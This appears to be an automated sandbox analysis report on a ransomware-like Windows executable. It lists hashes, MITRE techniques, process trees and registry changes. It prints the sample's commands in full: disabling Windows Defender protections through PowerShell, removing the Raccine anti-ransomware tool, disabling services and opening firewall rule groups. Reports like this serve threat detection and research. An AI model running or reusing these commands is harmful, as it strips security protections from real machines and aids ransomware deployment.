936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd

Resubmissions

29-10-2021 14:51

211029-r8nn1aacaj 10

23-03-2021 18:12

210323-s8jdk5y98j 10

Analysis

max time kernel
100s
max time network
142s
platform
windows10_x64
resource
win10v20201028
submitted
23-03-2021 18:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
Size

296KB
MD5

6b2c7d5298c7fb8f4c4c3531894a91c1
SHA1

d7333af03603b27566ac8ab63d6aa21575e1ebb4
SHA256

936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd
SHA512

2555a572e9088ce58dce5bcaf1c0fca76727b6a1e1315ec0dbfe588a796faf1d083cb6ff3a6362f7c8075a4f321228c6227db7a3207fa557fff68e9fd4a3e114

Score

10^/10

discovery evasion persistence trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Disables Task Manager via registry modification
evasion

Executes dropped EXE 2 IoCs

pid	Process
15088	yrbyuioh.exe
10156	dismhost.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Loads dropped DLL 5 IoCs

pid	Process
10156	dismhost.exe
10156	dismhost.exe
10156	dismhost.exe
10156	dismhost.exe
10156	dismhost.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
7404	icacls.exe
10968	icacls.exe
4372	icacls.exe
6212	icacls.exe
4376	icacls.exe
6696	icacls.exe
13348	icacls.exe
14596	icacls.exe
9028	icacls.exe
9008	icacls.exe
11080	icacls.exe
8796	icacls.exe
6440	icacls.exe
5488	icacls.exe
13148	Process not Found
14608	icacls.exe
13424	icacls.exe
13856	icacls.exe
6616	icacls.exe
9728	icacls.exe
16260	icacls.exe
5452	icacls.exe
10556	Process not Found
6992	icacls.exe
13308	icacls.exe
11716	icacls.exe
15416	icacls.exe
13928	icacls.exe
7488	icacls.exe
5784	icacls.exe
9488	Process not Found
9332	icacls.exe
13628	icacls.exe
16164	icacls.exe
12792	icacls.exe
10904	Process not Found
15304	icacls.exe
15592	icacls.exe
16364	icacls.exe
8356	icacls.exe
9728	Process not Found
15664	Process not Found
9128	icacls.exe
5380	icacls.exe
14412	icacls.exe
9132	icacls.exe
8524	Process not Found
11588	icacls.exe
15952	Process not Found
5952	Process not Found
9056	icacls.exe
17360	icacls.exe
12256	icacls.exe
14692	icacls.exe
16348	icacls.exe
11580	icacls.exe
4108	icacls.exe
17264	icacls.exe
10956	icacls.exe
7164	icacls.exe
4820	icacls.exe
17276	icacls.exe
11568	Process not Found
8348	icacls.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Внимание Внимание Внимание!!!"	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "У вас сложности с IT безопасностью?\r\n\r\nНаши специалисты Вам гарантировано помогут.\r\n\r\nДля этого напишите нам на почту - [email protected]"	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\VSTOFiles.cat	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\DISM\dism.log	powershell.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Discovers systems in the same network 1 TTPs 1 IoCs

discovery

Remote System Discovery

T1018

pid	Process
12308	net.exe

Kills process with taskkill 57 IoCs

evasion

pid	Process
11380	taskkill.exe
11340	taskkill.exe
4256	taskkill.exe
11120	taskkill.exe
11540	taskkill.exe
11444	taskkill.exe
11228	taskkill.exe
9956	taskkill.exe
11420	taskkill.exe
11388	taskkill.exe
11364	taskkill.exe
10076	taskkill.exe
4736	taskkill.exe
11412	taskkill.exe
11316	taskkill.exe
11236	taskkill.exe
11524	taskkill.exe
11372	taskkill.exe
11288	taskkill.exe
11268	taskkill.exe
11428	taskkill.exe
11404	taskkill.exe
11508	taskkill.exe
11500	taskkill.exe
11484	taskkill.exe
11452	taskkill.exe
11516	taskkill.exe
11332	taskkill.exe
11164	taskkill.exe
11128	taskkill.exe
10568	taskkill.exe
11244	taskkill.exe
11216	taskkill.exe
11532	taskkill.exe
11492	taskkill.exe
11468	taskkill.exe
11276	taskkill.exe
11476	taskkill.exe
11396	taskkill.exe
10044	taskkill.exe
11324	taskkill.exe
11260	taskkill.exe
11184	taskkill.exe
11348	taskkill.exe
11296	taskkill.exe
11140	taskkill.exe
11460	taskkill.exe
11436	taskkill.exe
11308	taskkill.exe
11204	taskkill.exe
11196	taskkill.exe
11176	taskkill.exe
11152	taskkill.exe
11548	taskkill.exe
11356	taskkill.exe
9980	taskkill.exe
11252	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
4824	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
Token: SeDebugPrivilege	416	powershell.exe
Token: SeIncreaseQuotaPrivilege	416	powershell.exe
Token: SeSecurityPrivilege	416	powershell.exe
Token: SeTakeOwnershipPrivilege	416	powershell.exe
Token: SeLoadDriverPrivilege	416	powershell.exe
Token: SeSystemProfilePrivilege	416	powershell.exe
Token: SeSystemtimePrivilege	416	powershell.exe
Token: SeProfSingleProcessPrivilege	416	powershell.exe
Token: SeIncBasePriorityPrivilege	416	powershell.exe
Token: SeCreatePagefilePrivilege	416	powershell.exe
Token: SeBackupPrivilege	416	powershell.exe
Token: SeRestorePrivilege	416	powershell.exe
Token: SeShutdownPrivilege	416	powershell.exe
Token: SeDebugPrivilege	416	powershell.exe
Token: SeSystemEnvironmentPrivilege	416	powershell.exe
Token: SeRemoteShutdownPrivilege	416	powershell.exe
Token: SeUndockPrivilege	416	powershell.exe
Token: SeManageVolumePrivilege	416	powershell.exe
Token: 33	416	powershell.exe
Token: 34	416	powershell.exe
Token: 35	416	powershell.exe
Token: 36	416	powershell.exe
Token: SeDebugPrivilege	1324	powershell.exe
Token: SeDebugPrivilege	1336	powershell.exe
Token: SeDebugPrivilege	3876	powershell.exe
Token: SeDebugPrivilege	1724	powershell.exe
Token: SeDebugPrivilege	2836	powershell.exe
Token: SeDebugPrivilege	2240	powershell.exe
Token: SeDebugPrivilege	3364	powershell.exe
Token: SeDebugPrivilege	4128	powershell.exe
Token: SeDebugPrivilege	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
Token: SeDebugPrivilege	4260	powershell.exe
Token: SeDebugPrivilege	4412	powershell.exe
Token: SeDebugPrivilege	4736	taskkill.exe
Token: SeDebugPrivilege	4512	powershell.exe
Token: SeDebugPrivilege	4628	powershell.exe
Token: SeIncreaseQuotaPrivilege	1324	powershell.exe
Token: SeSecurityPrivilege	1324	powershell.exe
Token: SeTakeOwnershipPrivilege	1324	powershell.exe
Token: SeLoadDriverPrivilege	1324	powershell.exe
Token: SeSystemProfilePrivilege	1324	powershell.exe
Token: SeSystemtimePrivilege	1324	powershell.exe
Token: SeProfSingleProcessPrivilege	1324	powershell.exe
Token: SeIncBasePriorityPrivilege	1324	powershell.exe
Token: SeCreatePagefilePrivilege	1324	powershell.exe
Token: SeBackupPrivilege	1324	powershell.exe
Token: SeRestorePrivilege	1324	powershell.exe
Token: SeShutdownPrivilege	1324	powershell.exe
Token: SeDebugPrivilege	1324	powershell.exe
Token: SeSystemEnvironmentPrivilege	1324	powershell.exe
Token: SeRemoteShutdownPrivilege	1324	powershell.exe
Token: SeUndockPrivilege	1324	powershell.exe
Token: SeManageVolumePrivilege	1324	powershell.exe
Token: 33	1324	powershell.exe
Token: 34	1324	powershell.exe
Token: 35	1324	powershell.exe
Token: 36	1324	powershell.exe
Token: SeIncreaseQuotaPrivilege	1336	powershell.exe
Token: SeSecurityPrivilege	1336	powershell.exe
Token: SeTakeOwnershipPrivilege	1336	powershell.exe
Token: SeLoadDriverPrivilege	1336	powershell.exe
Token: SeSystemProfilePrivilege	1336	powershell.exe
Token: SeSystemtimePrivilege	1336	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 728 wrote to memory of 416	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	75
PID 728 wrote to memory of 416	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	75
PID 728 wrote to memory of 1324	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	78
PID 728 wrote to memory of 1324	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	78
PID 728 wrote to memory of 1336	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	80
PID 728 wrote to memory of 1336	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	80
PID 728 wrote to memory of 3876	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	82
PID 728 wrote to memory of 3876	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	82
PID 728 wrote to memory of 1724	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	84
PID 728 wrote to memory of 1724	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	84
PID 728 wrote to memory of 2836	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	86
PID 728 wrote to memory of 2836	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	86
PID 728 wrote to memory of 2240	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	88
PID 728 wrote to memory of 2240	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	88
PID 728 wrote to memory of 3364	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	90
PID 728 wrote to memory of 3364	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	90
PID 728 wrote to memory of 4128	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	91
PID 728 wrote to memory of 4128	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	91
PID 728 wrote to memory of 4260	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	95
PID 728 wrote to memory of 4260	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	95
PID 728 wrote to memory of 4412	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	96
PID 728 wrote to memory of 4412	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	96
PID 728 wrote to memory of 4512	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	98
PID 728 wrote to memory of 4512	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	98
PID 728 wrote to memory of 4628	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	100
PID 728 wrote to memory of 4628	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	100
PID 728 wrote to memory of 4736	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	102
PID 728 wrote to memory of 4736	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	102
PID 728 wrote to memory of 4764	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	824
PID 728 wrote to memory of 4764	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	824
PID 728 wrote to memory of 4824	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	104
PID 728 wrote to memory of 4824	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	104
PID 728 wrote to memory of 4920	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	107
PID 728 wrote to memory of 4920	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	107
PID 728 wrote to memory of 5020	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	150
PID 728 wrote to memory of 5020	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	150
PID 728 wrote to memory of 5092	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	130
PID 728 wrote to memory of 5092	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	130
PID 728 wrote to memory of 4136	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	939
PID 728 wrote to memory of 4136	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	939
PID 728 wrote to memory of 3576	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	110
PID 728 wrote to memory of 3576	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	110
PID 728 wrote to memory of 4484	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	126
PID 728 wrote to memory of 4484	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	126
PID 728 wrote to memory of 4608	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	175
PID 728 wrote to memory of 4608	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	175
PID 728 wrote to memory of 3944	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	112
PID 728 wrote to memory of 3944	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	112
PID 728 wrote to memory of 3928	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	926
PID 728 wrote to memory of 3928	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	926
PID 728 wrote to memory of 4380	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	820
PID 728 wrote to memory of 4380	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	820
PID 728 wrote to memory of 4800	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	927
PID 728 wrote to memory of 4800	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	927
PID 728 wrote to memory of 4652	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	117
PID 728 wrote to memory of 4652	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	117
PID 728 wrote to memory of 5152	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	119
PID 728 wrote to memory of 5152	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	119
PID 728 wrote to memory of 5260	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	928
PID 728 wrote to memory of 5260	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	928
PID 728 wrote to memory of 5300	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	131
PID 728 wrote to memory of 5300	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	131
PID 728 wrote to memory of 5332	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	132
PID 728 wrote to memory of 5332	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	132

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Внимание Внимание Внимание!!!"	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "У вас сложности с IT безопасностью?\r\n\r\nНаши специалисты Вам гарантировано помогут.\r\n\r\nДля этого напишите нам на почту - [email protected]"	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe

C:\Users\Admin\AppData\Local\Temp\936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
"C:\Users\Admin\AppData\Local\Temp\936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe"
1⤵
- Modifies WinLogon
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:728
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:416
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1324
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1336
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3876
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1724
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2836
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2240
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3364
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4128
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4260
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4412
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4512
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4628
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4736
- C:\Windows\SYSTEM32\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:4824
- C:\Windows\SYSTEM32\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:4920
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:3576
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:3944
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:3928
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:4800
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:4652
- C:\Windows\SYSTEM32\arp.exe
  "arp" -a
  2⤵
  PID:5152
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:4380
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TrueKeyScheduler /y
    3⤵
    PID:12088
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:4608
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
